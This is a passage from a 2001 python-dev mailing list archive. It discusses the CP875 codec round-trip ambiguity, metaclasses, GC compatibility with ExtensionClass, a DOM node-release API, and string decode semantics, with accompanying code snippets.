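def drop_substitute_aliases(decoding_map, keep=0x3F):
    """Return a copy where only byte `keep` still decodes to SUBSTITUTE.

    The other bytes that decoded to U+001A are marked undefined (None).
    `keep` defaults to 0x3F, the EBCDIC substitution character.
    """
    fixed = dict(decoding_map)
    for byte, code_point in decoding_map.items():
        if code_point == SUBSTITUTE and byte != keep:
            fixed[byte] = None
    return fixed

def is_round_trippable(decoding_map):
    """True if no two defined bytes decode to the same code point."""
    defined = [cp for cp in decoding_map.values() if cp is not None]
    return len(defined) == len(set(defined))

cp875_subset = {b: SUBSTITUTE for b in (0x3F, 0xDC, 0xE1, 0xEC, 0xED, 0xFC, 0xFD)}
cp875_subset[0xC1] = 0x41

print(is_round_trippable(cp875_subset))                           # False
print(is_round_trippable(drop_substitute_aliases(cp875_subset)))  # True
```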

The second seems to be more correct to me, although it is a deviation
from the Unicode consortium publications.

Regards,
Martin


From guido@digicool.com  Sat May 12 22:21:21 2001
From: guido@digicool.com (Guido van Rossum)
Date: Sat, 12 May 2001 16:21:21 -0500
Subject: [Python-Dev] Type/class
In-Reply-To: Your message of "Sat, 12 May 2001 11:07:06 -0400."
 <Pine.NXT.4.21.0105121011450.241-100000@localhost>
References: <Pine.NXT.4.21.0105121011450.241-100000@localhost>
Message-ID: <200105122121.QAA10000@cj20424-a.reston1.va.home.com>

> Also: There are two basic implementation models:
> 
> Delegation  [a.k.a. "Lifetime sharing", cloning]
>   sort of like python -- if you don't know how to handle it "ask" 
>   a parent object. ( "ask" in quotes, because I've recently been
>   in a long argument about whether objective-C & smalltalk can
>   really be said to "send messages" , or if it's "just" dynamic
>   lookup and function application! ) 
> 
> Extension  [a.k.a. "Birth sharing", copying, concatenation ]
>   more like how I imaging C++ vtables are built -- the python 
>   equivalent would be like merging all of the class __dict__'s
>   together with name-clase priority going to the nearest
>   relative. 
> 
> ( "Life Sharing" vs. "Birth Sharing" -- is a change in the
>   base class after object creation inherited by the object? )

Interesting.  So is the rest of this thread, but since Python is not a
prototype language and is unlikely to become one, I'd like to mention
that Python 2.2 will likely allow you to choose either paradigm, on a
per-class basis, using metaclasses.

I'm finding metaclasses in Python useful for different things than
they are in Smalltalk, and I expect that they will continue to play a
less important role.  But they are important because they control many
"policy" aspects of Python classes/types: e.g. whether instances have
a __dict__ or a specific set of slots (maybe even typed slots),
whether changes can be made to a class after it's been created, the
semantics of multiple inheritance, and so on.
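As an illustration of one such policy, "whether changes can be made to a class after it's been created", here is a sketch in today's Python 3 syntax, which postdates this thread. `FrozenClassMeta` is a hypothetical name, not part of any released API.

```python
class FrozenClassMeta(type):
    """Hypothetical metaclass: a class's attributes are fixed once created."""

    def __setattr__(cls, name, value):
        raise TypeError(f"class {cls.__name__} cannot be modified after creation")

    def __delattr__(cls, name):
        raise TypeError(f"class {cls.__name__} cannot be modified after creation")


class Point(metaclass=FrozenClassMeta):
    dims = 2


p = Point()
p.x = 1            # instances are unaffected; only the class is frozen

try:
    Point.dims = 3
except TypeError as exc:
    print(exc)     # class Point cannot be modified after creation
```

Class creation still works because `type.__new__` fills in the class namespace directly rather than going through the metaclass's `__setattr__`.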

Right now, my metaclasses continue to be implemented in C, although I
expect that eventually they will be subclassable in Python.  Watch the
descr-branch in the CVS tree.  I hope I'll soon have some time to write
a PEP, too.

It's an interesting journey!  The book I am reading about this:
"Putting Metaclasses to Work" by Ira Forman and Scott Danforth.
http://cseng.awl.com/book/0,3828,0201433052,00.html

--Guido van Rossum (home page: http://www.python.org/~guido/)


From sdm7g@Virginia.EDU  Sat May 12 21:53:26 2001
From: sdm7g@Virginia.EDU (Steven D. Majewski)
Date: Sat, 12 May 2001 16:53:26 -0400 (EDT)
Subject: [Python-Dev] Type/class
In-Reply-To: <200105122121.QAA10000@cj20424-a.reston1.va.home.com>
Message-ID: <Pine.NXT.4.21.0105121640050.261-100000@localhost>


On Sat, 12 May 2001, Guido van Rossum wrote:

> Interesting.  So is the rest of this thread, but since Python is not a
> prototype language and is unlikely to become one, I'd like to mention
> that Python 2.2 will likely allow you to choose either paradigm, on a
> per-class basis, using metaclasses.

 As I said earlier: the only advantage would be if it could simplify 
things "under the hood" (compared to metaclasses) but could still 
provide the same Class semantics (with maybe a "proto" declaration
sneaking its nose in under the tent.)
 But I have no immediate idea on how to do that, and it sounds like
you're pretty far along into an implementation already. 

> I'm finding metaclasses in Python useful for different things than
> they are in Smalltalk, and I expect that they will continue to play a
> less important role.  But they are important because they control many
> "policy" aspects of Python classes/types: e.g. whether instances have
> a __dict__ or a specific set of slots (maybe even typed slots),
> whether changes can be made to a class after it's been created, the
> semantics of multiple inheritance, and so on.

 I guess my practical question, which I meant to ask before I got
myself sidetracked into preaching prototypes is: How much of the
existing plumbing (specifically the Don Beaudry hack) can I rely
on in the future for the objective-C/python bridge ? 
 With BOOST and Zope's extension classes relying on it, can I 
assume that it's being extended rather than replaced ? 
( I guess I ought to take a look at the code! ) 

> It's an interesting journey!  The book I am reading about this:
> "Putting Metaclasses to Work" by Ira Forman and Scott Danforth.
> http://cseng.awl.com/book/0,3828,0201433052,00.html

Thanks for the reference. 
Talking about interesting journeys:

 Guido: did you ever imagine back at that first workshop at NIST
that you and Python would be where you are today ? 


-- Steve Majewski 


From gmcm@hypernet.com  Sat May 12 22:09:41 2001
From: gmcm@hypernet.com (Gordon McMillan)
Date: Sat, 12 May 2001 17:09:41 -0400
Subject: [Python-Dev] Type/class
In-Reply-To: <200105122121.QAA10000@cj20424-a.reston1.va.home.com>
References: Your message of "Sat, 12 May 2001 11:07:06 -0400."             <Pine.NXT.4.21.0105121011450.241-100000@localhost>
Message-ID: <3AFD6E55.1096.B4BFBD3F@localhost>

[Guido]
> It's an interesting journey!  The book I am reading about this:
> "Putting Metaclasses to Work" by Ira Forman and Scott Danforth.
> http://cseng.awl.com/book/0,3828,0201433052,00.html

The two things that struck me most when I read that last year:
 
 - How eminently ill-suited C++ is for this stuff (the book 
develops a framework in C++)

 - a very convincing argument that if you derive C from A and B 
(whose metaclasses are not the same), the system must 
derive a metaclass for C, using MI from A and B's 
metaclasses.
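Modern Python 3 follows the rule described here. A minimal sketch with hypothetical metaclasses: deriving `C` from `A` and `B` fails until a metaclass is derived, by MI, from both bases' metaclasses.

```python
class MetaA(type):
    """Metaclass of A (hypothetical)."""

class MetaB(type):
    """Metaclass of B (hypothetical)."""

class A(metaclass=MetaA):
    pass

class B(metaclass=MetaB):
    pass

# Deriving C directly fails: neither metaclass is a subclass of the other.
try:
    class C(A, B):
        pass
except TypeError as exc:
    conflict = exc
else:
    conflict = None

# Derive C's metaclass using MI from A's and B's metaclasses.
class MetaAB(MetaA, MetaB):
    pass

class C(A, B, metaclass=MetaAB):
    pass

print(conflict is not None)                           # True
print(isinstance(C, MetaA) and isinstance(C, MetaB))  # True
```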

duct-tape-skull-cap-advised-ly y'rs

- Gordon


From tim.one@home.com  Sat May 12 22:22:49 2001
From: tim.one@home.com (Tim Peters)
Date: Sat, 12 May 2001 17:22:49 -0400
Subject: [Python-Dev] Ill-defined encoding for CP875?
In-Reply-To: <02e501c0dade$ab7f1080$e46940d5@hagrid>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEMNKBAA.tim.one@home.com>

[/F]
> reverse sorting makes sense to me.  but the cp-files appear to be
> machine generated, so patching that python file won't help.

Agreed.

> a truly future-proof solution would be to specify exactly how to
> resolve every many-to-one mapping, for every font having that
> problem.  but sorting them is clearly better than relying on
> implementation-dependent behaviour...

The attached program suggests the problem is rare; of those encoding files
that have a Python decoding_map dict, only these triggered a meaningful
ambiguity complaint:

*** cp1006.py maps 0xfe8e back to 0xb1, 0xb2
*** cp875.py maps 0x1a back to 0x3f, 0xdc, 0xe1, 0xec, 0xed, 0xfc, 0xfd

Then since test_unicode only checks for roundtrip across range(0x80), cp875
is the only one that *can* fail (the ambiguities in cp1006 are for points >
0x7f, so aren't tested here).

Hmm!  Now I see that in a part of test_unicode that wasn't reached, cp875 and
cp1006 are excluded, with this comment:

    ### These fail the round-trip:
    #'cp1006', 'cp875', 'iso8859_8',

So the practical hack for now is to exclude cp875 from the earlier range(128)
roundtrip test too.
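A Python 3 sketch of a roundtrip check with an explicit exclusion list, modelled loosely on the test_unicode loop quoted elsewhere in this thread. `KNOWN_NON_ROUNDTRIP` and `roundtrip_failures` are hypothetical names.

```python
# Codecs known to be ambiguous in reverse; skipped rather than reported.
KNOWN_NON_ROUNDTRIP = {"cp875"}

def roundtrip_failures(encodings, byte_values=range(128)):
    """Return the encodings whose decode/encode roundtrip changes the data."""
    data = bytes(byte_values)
    failures = []
    for encoding in encodings:
        if encoding in KNOWN_NON_ROUNDTRIP:
            continue
        try:
            if data.decode(encoding).encode(encoding) != data:
                failures.append(encoding)
        except (UnicodeError, LookupError):
            failures.append(encoding)
    return failures

print(roundtrip_failures(["ascii", "latin-1", "cp875"]))  # []
```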

> (is Jython using exactly the same hashing and dictionary algorithms as
> CPython?  or does it work by accident also under Jython?)

Sorry, no idea.  Attempting to browse the Jython source on SourceForge caused
this cute behavior:

http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/jython/jython/Lib/

    Python Exception Occurred

    Traceback (innermost last):
      File "/usr/lib/cgi-bin/viewcvs.cgi", line 2286, in ?
        main()
      File "/usr/lib/cgi-bin/viewcvs.cgi", line 2253, in main
        view_directory(request)
      File "/usr/lib/cgi-bin/viewcvs.cgi", line 1043, in view_directory
        fileinfo, alltags = get_logs(full_name, rcs_files, view_tag)
      File "/usr/lib/cgi-bin/viewcvs.cgi", line 987, in get_logs
        raise 'error during rlog: '+hex(status)
    error during rlog: 0x100

let's-rewrite-it-in-php<wink>-ly y'rs  - tim

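# Scan the codec modules in ENCODING_DIR and report every decoding_map
# that sends more than one byte to the same Unicode code point (i.e. an
# ambiguous reverse mapping).
ENCODING_DIR = "../Lib/encodings"

import os
import imp

def d(w):
    # Format ints as hex, anything else via repr().
    if type(w) is type(6):
        return hex(w)
    else:
        return repr(w)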

encfiles = [name for name in os.listdir(ENCODING_DIR)
                 if name.endswith(".py") and name[0] != "_"]

for fname in encfiles:
    path = os.path.join(ENCODING_DIR, fname)
    f = open(path)
    module = imp.load_source(fname[:-3], path, f)
    f.close()
    decode = getattr(module, "decoding_map", None)
    if decode is None:
        print fname, "doesn't have decoding_map."
        continue
    vtok = {}
    for k, v in decode.items():
        if v in vtok:
            vtok[v].append(k)
        else:
            vtok[v] = [k]
    ambiguous = [(v, ks) for v, ks in vtok.items()
                         if len(ks) > 1]
    if ambiguous:
        for v, ks in ambiguous:
            ks.sort()
            print "***", fname, "maps", d(v), "back to", \
                  ", ".join(map(d, ks))
    else:
        print fname, "is free of ambiguous reverse maps."


From tim.one@home.com  Sat May 12 22:48:38 2001
From: tim.one@home.com (Tim Peters)
Date: Sat, 12 May 2001 17:48:38 -0400
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
In-Reply-To: <200105122012.f4CKCd201688@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCOENCKBAA.tim.one@home.com>

[Martin v. Loewis, whose encyclopedic knowledge of encoding details
 still isn't enough to get a clear answer (it's like somebody asking
 me for a simple answer to a floating point question <wink>)]

> ...
> So I think we can take one of two approaches:
>
> 1. admit that CP 875 is not round-trippable, and exclude it from the
>    test (although when looking at the first 128 characters only, it
>    is round-trippable).

As I noted later, 875 is already excluded from the roundtrip test across
range(128, 256).  What it's failing is the roundtrip test across range(128):
after unicode("?", "cp875") produces u'\x1a', the following .encode('cp875')
has no way to know which of the ambiguous bytes the original input came from.  So it's not
really round-trippable across range(128) either unless more info is given to
.encode().

> 2. remove the SUBSTITUTE mappings from CP875, acknowledging that
>    apparently these characters have no meaning in that code page.
>    Unfortunately, I could not find any official IBM documentation
>    page that lists the characters supported in each of the EBCDIC
>    code pages.
>
> The second seems to be more corrrect to me, although it is a deviation
> from the Unicode consortium publications.

Until you and MAL agree on the best thing to do (I have no opinion:  my only
exposure to Unicode in daily programming life remains the Python test suite),
I'm going to opt for #1:  as cp875.py stands today, it's simply a fact that
it's not round-trippable across any range including 0x3f.


From martin@loewis.home.cs.tu-berlin.de  Sat May 12 23:32:10 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sun, 13 May 2001 00:32:10 +0200
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: <200105122108.QAA09951@cj20424-a.reston1.va.home.com> (message
 from Guido van Rossum on Sat, 12 May 2001 16:08:05 -0500)
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com>
Message-ID: <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de>

> Now, if you are using the 1.4 version of ExtensionClasses you might
> not have the tp_flags field either (I don't know, I can't easily
> check) but the 1.5.2-compatible version of ExtensionClasses doesn't
> even require recompilation to work with Python 2.1.

I'll attach a copy below of the struct as defined in
pygtk-0.7.0-unstable-dont-use.tar.gz (0.6.6 does not use extension
classes). As you can see, it does not provide tp_flags, but has a
field of tp_xxx4 for it.

That *should* work, except that it also has its 'methods' field where
tp_traverse would go, and its class_flags field where tp_clear would
go.
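A simplified sketch of this overlap using Python's ctypes. Both layouts are hypothetical three-field stand-ins, not the real PyTypeObject or PyExtensionClass. They only show that a field appended to an old copy of a struct sits at the same offset as a slot the newer struct added there, so code reading the new slot gets the old field's bits.

```python
import ctypes

class OldCopy(ctypes.Structure):
    # Stand-in for a struct copied from an old header: a shared prefix
    # (tp_doc), then the copier's own extra fields.
    _fields_ = [
        ("tp_doc", ctypes.c_char_p),
        ("methods", ctypes.c_void_p),
        ("class_flags", ctypes.c_long),
    ]

class NewType(ctypes.Structure):
    # Stand-in for the newer struct, which grew new slots directly
    # after the same shared prefix.
    _fields_ = [
        ("tp_doc", ctypes.c_char_p),
        ("tp_traverse", ctypes.c_void_p),
        ("tp_clear", ctypes.c_void_p),
    ]

old = OldCopy(b"an extension class", 0x1234, 0)

# Reinterpret the same memory the way newer code would see it.
as_new = ctypes.cast(ctypes.pointer(old), ctypes.POINTER(NewType)).contents

print(OldCopy.methods.offset == NewType.tp_traverse.offset)  # True
print(hex(as_new.tp_traverse))  # 0x1234: the 'methods' value, not a function
```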

Now, you write

> ExtensionClasses (at least recent versions that worked with 1.5.2)
> contain a copy of the type object up to and including the tp_flags
> field, and the 2.1 code is careful not to use any newer fields
> without first checking the corresponding flag bit.

In this generality, it is apparently not true: Modules/gcmodule.c has,
in delete_garbage,

			if ((clear = op->ob_type->tp_clear) != NULL) {
...
		traverse = PyObject_FROM_GC(gc)->ob_type->tp_traverse;
		(void) traverse(PyObject_FROM_GC(gc),
			       (visitproc)visit_decref,
			       NULL);

which does not check any flags. That still shouldn't cause any
problems, since the Gtk objects should never end up in the GC lists -
but maybe I'm missing something.

Regards,
Martin

typedef struct {
	PyObject_VAR_HEAD
	char *tp_name; /* For printing */
	int tp_basicsize, tp_itemsize; /* For allocation */
	
	/* Methods to implement standard operations */
	
	destructor tp_dealloc;
	printfunc tp_print;
	getattrfunc tp_getattr;
	setattrfunc tp_setattr;
	cmpfunc tp_compare;
	reprfunc tp_repr;
	
	/* Method suites for standard classes */
	
	PyNumberMethods *tp_as_number;
	PySequenceMethods *tp_as_sequence;
	PyMappingMethods *tp_as_mapping;

	/* More standard operations (at end for binary compatibility) */

	hashfunc tp_hash;
	ternaryfunc tp_call;
	reprfunc tp_str;
	getattrofunc tp_getattro;
	setattrofunc tp_setattro;
	/* Space for future expansion */
	long tp_xxx3;
	long tp_xxx4;

	char *tp_doc; /* Documentation string */

#ifdef COUNT_ALLOCS
	/* these must be last */
	int tp_alloc;
	int tp_free;
	int tp_maxalloc;
	struct _typeobject *tp_next;
#endif
  PyMethodChain methods;
  long class_flags;
  PyObject *class_dictionary;
  PyObject *bases;
  PyObject *reserved;
} PyExtensionClass;


From martin@loewis.home.cs.tu-berlin.de  Sun May 13 13:08:02 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sun, 13 May 2001 14:08:02 +0200
Subject: [Python-Dev] ReleaseNode interface in 4XSLT
Message-ID: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de>

Currently, 4XSLT has a dependency on the DOM implementation in terms
of memory management (among other dependencies). I'd like to reduce
this dependency, by providing a centralized function that knows how to
release nodes.

In PyXML, I currently use

# Define ReleaseNode in a DOM-independent way
import xml.dom.ext
import xml.dom.minidom
def _releasenode(n):
    if isinstance(n, xml.dom.minidom.Node):
        n.unlink()
    else:
        xml.dom.ext.ReleaseNode(n)

try:
    from Ft.Lib import pDomlette
    def ReleaseNode(n):
        if isinstance(n, pDomlette.Node):
            pDomlette.ReleaseNode(n)
        else:
            _releasenode(n)
    _XsltElementBase = pDomlette.Element
except ImportError:
    ReleaseNode = _releasenode
    from minisupport import _XsltElementBase

This code knows how to release minidom, 4DOM, and pDomlette nodes, and
supports installations without 4Suite (i.e. without pDomlette). I've
put this into xslt/__init__.py, so that all callers of
Ft.Lib.pDomlette.ReleaseNode now need to call xml.xslt.ReleaseNode.
If desired, I could produce a patch against the public Ft CVS.

As a slightly independent question, such a function also ought to
support DOM implementations not known to it; I'm thinking in
particular of the Zope DOMs. I'd like to hear proposals on how such an
interface should work; I see three options:

a) it is an operation on the document node (or any node), as in minidom.
b) it is an operation on the DOM implementation (almost as in 4Suite;
   you'd need to navigate from the node to the implementation, then
   you'd need a well-known operation on the implementation)
c) the code assumes that no release activity is necessary for unknown
   DOMs, effectively believing in reference counting, garbage collection,
   acquisition, and other black art.
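One possible shape for such an interface, sketched in Python 3. It combines explicit registration, like the isinstance dispatch in the code above, with fallbacks to option (a) and option (c). `register_releaser` and `release_node` are hypothetical names. Only `xml.dom.minidom` and its `unlink()` method are real.

```python
import xml.dom.minidom

_releasers = []  # (node class, release function) pairs, checked in order


def register_releaser(node_class, release):
    """Register release(node) for instances of node_class (hypothetical API)."""
    _releasers.append((node_class, release))


def release_node(node):
    """Release node and report which strategy handled it."""
    for node_class, release in _releasers:
        if isinstance(node, node_class):
            release(node)
            return "registered"
    unlink = getattr(node, "unlink", None)
    if callable(unlink):
        unlink()            # option (a): an operation on the node, as in minidom
        return "unlink"
    return "nothing"        # option (c): rely on refcounting and GC


doc = xml.dom.minidom.parseString("<root><child/></root>")
print(release_node(doc))       # unlink
print(release_node(object()))  # nothing
```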

Any comments appreciated, in particular
1. from the Ft maintainers on introducing xml.xslt.ReleaseNode, and
2. from authors of other DOMs on a general memory management API for
   Python DOM.

Regards,
Martin


From mwh@python.net  Sun May 13 13:36:26 2001
From: mwh@python.net (Michael Hudson)
Date: 13 May 2001 13:36:26 +0100
Subject: [Python-Dev] "data".decode(encoding) ?!
In-Reply-To: "M.-A. Lemburg"'s message of "Fri, 11 May 2001 12:07:40 +0200"
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <m38zk6s2kl.fsf@atrus.jesus.cam.ac.uk> <3AFBB221.F29BCB9A@lemburg.com> <049801c0d9fe$cd98aef0$e46940d5@hagrid> <3AFBB9EC.F75C158D@lemburg.com>
Message-ID: <m31yptqvcl.fsf@atrus.jesus.cam.ac.uk>

"M.-A. Lemburg" <mal@lemburg.com> writes:

> Fredrik Lundh wrote:
> > can you take that again?  shouldn't michael's example be
> > equivalent to:
> > 
> >     unicode(u"\u00e3".encode("latin-1"), "latin-1")
> > 
> > if not, I'd argue that your "decode" design is broken, instead
> > of just buggy...
> 
> Well, it is sort of broken, I agree. The reason is that 
> PyString_Encode() and PyString_Decode() guarantee the returned
> object to be a string object. To be able to reuse Unicode codecs
> I added code which converts Unicode back to a string in case the
> codec return an Unicode object (which the .decode() method does).
> This is what's failing.

It strikes me that if someone executes

aString.decode("latin-1")

they're going to expect a unicode string.  AIUI, what's currently
happening is that the string is converted from a latin-1 8-bit string
to the 16-bit unicode string I expected and then there is an attempt
to convert it back to an 8-bit string using the default encoding.  So
if I'd done a 

sys.setdefaultencoding("latin-1")

in my sitecustomize.py, then aString.decode("latin-1") would just be
aString again?  This doesn't seem optimal.

> Perhaps I should simply remove the restriction and have both APIs
> return the codec's return object as-is ?! (I would be in favour of
> this, but I'm not sure whether this is already in use by someone...)

Are all the codecs distributed with Python 2.1 unicode-related?  If
that's the case, PyString_Decode isn't terribly useful is it?  It
seems unlikely that it received much use.  Could be wrong of course.

OTOH, maybe I'm trying to wedge too much behaviour onto a particular
operation.  Do we want

open(file).read().decode("jpeg") -> some kind of PIL object

to be possible?

Cheers,
M.

-- 
  GET   *BONK*
  BACK  *BONK*
  IN    *BONK*
  THERE *BONK*             -- Naich using the troll hammer in cam.misc


From mal@lemburg.com  Sun May 13 17:53:55 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Sun, 13 May 2001 18:53:55 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <m38zk6s2kl.fsf@atrus.jesus.cam.ac.uk> <3AFBB221.F29BCB9A@lemburg.com> <049801c0d9fe$cd98aef0$e46940d5@hagrid> <3AFBB9EC.F75C158D@lemburg.com> <m31yptqvcl.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <3AFEBC22.1F0AF685@lemburg.com>

Michael Hudson wrote:
> 
> "M.-A. Lemburg" <mal@lemburg.com> writes:
> 
> > Fredrik Lundh wrote:
> > > can you take that again?  shouldn't michael's example be
> > > equivalent to:
> > >
> > >     unicode(u"\u00e3".encode("latin-1"), "latin-1")
> > >
> > > if not, I'd argue that your "decode" design is broken, instead
> > > of just buggy...
> >
> > Well, it is sort of broken, I agree. The reason is that
> > PyString_Encode() and PyString_Decode() guarantee the returned
> > object to be a string object. To be able to reuse Unicode codecs
> > I added code which converts Unicode back to a string in case the
> > codec return an Unicode object (which the .decode() method does).
> > This is what's failing.
> 
> It strikes me that if someone executes
> 
> aString.decode("latin-1")
> 
> they're going to expect a unicode string.  AIUI, what's currently
> happening is that the string is converted from a latin-1 8-bit string
> to the 16-bit unicode string I expected and then there is an attempt
> to convert it back to an 8-bit string using the default encoding.  So
> if I'd done a
> 
> sys.setdefaultencoding("latin-1")
> 
> in my sitecustomize.py, then aString.decode("latin-1") would just be
> aString again?  This doesn't seem optimal.

True, and that's why I am proposing to loosen the restriction
that the two APIs return only strings.
 
> > Perhaps I should simply remove the restriction and have both APIs
> > return the codec's return object as-is ?! (I would be in favour of
> > this, but I'm not sure whether this is already in use by someone...)
> 
> Are all the codecs ditributed with Python 2.1 unicode-related?  If
> that's the case, PyString_Decode isn't terribly useful is it?  It
> seems unlikely that it received much use.  Could be wrong of course.

All standard codecs in 2.0 and 2.1 are Unicode related. I am
planning to write up a bunch of string-to-string codecs next
week though which will then be the first non-Unicode related
codecs in 2.2.

> OTOH, maybe I'm trying to wedge to much behaviour onto a a particular
> operation.  Do we want
> 
> open(file).read().decode("jpeg") -> some kind of PIL object
> 
> to be possible?

This would be possible indeed. Even though some may find this
coding style obscure, I think this technique has the same
usefulness as e.g. piping at OS level.
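For comparison, here is how this style of chaining looks in today's Python 3, which postdates this thread. `bytes.decode()` is limited to text encodings, and bytes-to-bytes codecs go through `codecs.encode()`/`codecs.decode()`. Python 3 ships a `zlib_codec` rather than a "gzip" codec, so the sketch uses zlib for the transfer-encoding case.

```python
import codecs

# bytes -> str: object construction
text = b"caf\xe9".decode("latin-1")

# str -> bytes in another code page: recoding data
recoded = text.encode("cp1252")

# bytes -> bytes transfer encoding and decoding
payload = b"...long data..." * 100
packed = codecs.encode(payload, "zlib_codec")
unpacked = codecs.decode(packed, "zlib_codec")

print(len(packed) < len(payload), unpacked == payload)  # True True
```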

I am thinking of these use cases:

"���".decode("latin-1") -> Unicode (object construction)
"...jpeg data...".decode("jpeg") -> JpegImage object (ditto)
"���".decode("latin-1").encode("cp1521") -> string (recoding data)
"...long data...".encode("gzip") -> string (transfer encoding)
"...gzipped data...".decode("gzip") -> string (transfer decoding)
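For comparison, here is a minimal sketch of how these use cases map onto present-day Python 3, which postdates this thread. There, `bytes.decode()` and `str.encode()` are restricted to text codecs, and bytes-to-bytes transforms go through `codecs.encode()`/`codecs.decode()`. The standard library ships a `zlib_codec` rather than a codec named "gzip", so it stands in for the gzip example here. No "jpeg" codec exists in the standard library, so that case is left out.

```python
import codecs

raw = b"\xe4\xf6\xfc"                   # Latin-1 bytes for "äöü"

# Object construction: bytes -> str (a Unicode string)
text = raw.decode("latin-1")

# Recoding: Latin-1 bytes -> Unicode -> Windows-1252 bytes
recoded = raw.decode("latin-1").encode("cp1252")

# Transfer encoding/decoding: bytes -> bytes through a non-text codec
payload = b"...long data..." * 100
packed = codecs.encode(payload, "zlib_codec")
unpacked = codecs.decode(packed, "zlib_codec")

print(text, recoded, len(payload), len(packed), unpacked == payload)
```

Keeping the bytes-to-bytes transforms out of the `.encode()`/`.decode()` methods means those methods always have a predictable return type.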

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal@lemburg.com  Sun May 13 18:20:01 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Sun, 13 May 2001 19:20:01 +0200
Subject: [Python-Dev] Re: Ill-defined encoding for CP875?
References: <LNBBLJKPBEHFEDALKOLCOELPKBAA.tim_one@email.msn.com>
Message-ID: <3AFEC241.62084286@lemburg.com>

Tim Peters wrote:
> 
> I have a way to make dict lookup a teensy bit cheaper(*) that significantly
> reduces the number of collisions (which is much more valuable).
> 
> This caused a number of std tests to fail, because they were implicitly
> relying on the order in which a dict's entries are materialized via .keys()
> or .items().
> 
> Most of these were easy enough to fix.  The last failure remaining is
> test_unicode, and I don't know how to fix it.  It's dying here:
> 
>     try:
>         verify(unicode(s,encoding).encode(encoding) == s)
>     except TestFailed:
>         print '*** codec "%s" failed round-trip' % encoding
>     except ValueError,why:
>         print '*** codec for "%s" failed: %s' % (encoding, why)
> 
> when encoding == "cp875".  There's a bogus problem you have to worm around
> first:  test_unicode neglected to import TestFailed, so it actually dies
> with NameError while trying the "except TestFailed" clause after verify()
> raises TestFailed.  Once that's repaired, it's complaining about failing the
> round-trip encoding.

Ooops; this must have been caused by the assert statement
removal in the test suite I hacked up some months ago. Funny that
it never showed up... the code seems to be very robust ;-)
 
> The original character in s it's griping about is "?" (0x3f).  cp875.py has
> this entry in its decoding_map dict:
> 
>         0x003f: 0x001a, # SUBSTITUTE
> 
> But 0x1a is not a *unique* value in this dict.  There's also
> 
>         0x00dc: 0x001a, # SUBSTITUTE
>         0x00e1: 0x001a, # SUBSTITUTE
>         0x00ec: 0x001a, # SUBSTITUTE
>         0x00ed: 0x001a, # SUBSTITUTE
>         0x00fc: 0x001a, # SUBSTITUTE
>         0x00fd: 0x001a, # SUBSTITUTE
> 
> Therefore what appears associated with 0x1a in the derived encoding_map
> dict:
> 
> encoding_map = {}
> for k,v in decoding_map.items():
>     encoding_map[v] = k
> 
> may end up being any of the 7 decoding_map keys that map to 0x1a.  It just
> so happened to map back to 0x3f before, but to 0xfd after the dict change,
> so "?" doesn't survive the round trip anymore.

The "right" thing to do here is to simply remove cp875
from the test for round-tripping. It is not the only encoding
which fails this test, but it's not our fault: the codecs were
all generated from the original codec maps at the Unicode.org site.

If their mappings are broken, we can't do much about it... other
than to ignore the error or remove the codec altogether.
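The inversion problem Tim describes can be detected before the encoding map is built. Here is a minimal sketch, not part of Python's codec machinery: it groups the decoding_map keys by value and reports every value that more than one key maps to. The sample map is a hypothetical excerpt built from the seven cp875 entries quoted above, plus one ordinary entry. With the naive loop, whichever key the dict yields last wins, and that is exactly the iteration-order dependence the dict change exposed.

```python
from collections import defaultdict

def find_ambiguous_targets(decoding_map):
    """Return {target: sorted source keys} for each target reached by 2+ keys."""
    sources = defaultdict(list)
    for key, value in decoding_map.items():
        sources[value].append(key)
    return {value: sorted(keys) for value, keys in sources.items() if len(keys) > 1}

# Hypothetical excerpt modelled on the cp875 SUBSTITUTE entries quoted above
decoding_map = {
    0x003F: 0x001A, 0x00DC: 0x001A, 0x00E1: 0x001A,
    0x00EC: 0x001A, 0x00ED: 0x001A, 0x00FC: 0x001A, 0x00FD: 0x001A,
    0x0041: 0x0041,
}
print(find_ambiguous_targets(decoding_map))
```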

-- 
Marc-Andre Lemburg


From mal@lemburg.com  Sun May 13 18:40:58 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Sun, 13 May 2001 19:40:58 +0200
Subject: [Python-Dev] IDLE and non-ASCII characters
References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de>
Message-ID: <3AFEC72A.33076220@lemburg.com>

Martin von Loewis wrote:
> 
> Thanks to a bug report I got, I noticed for the first time that you
> cannot enter non-ASCII characters in IDLE anymore. Eg. at the shell
> prompt, you may get
> 
> >>> s='äö'
> UnicodeError: ASCII encoding error: ordinal not in range(128)
> 
> Likewise, when trying to save a file that has non-ASCII characters,
> you get a traceback.
> 
> Now, I think I understand all the causes of the problem (Tkinter
> returning Unicode objects, and so on). However, I'm curious whether
> anybody has proposals on how to deal with it.
> 
> For saving text files, if Python had an encoding directive, things
> might be easier :-) For the shell prompt, I've no idea how to solve
> this best.
> 
> So any suggestions are welcome.

I have a bug report assigned to myself which indicates similar
problems with _tkinter and Tk/Tcl. There were other problem
reports on the German Python mailing list going in the same
direction too.

The basic problem seems to be that Tk/Tcl applies too much
magic to the text widget contents in order to find out the
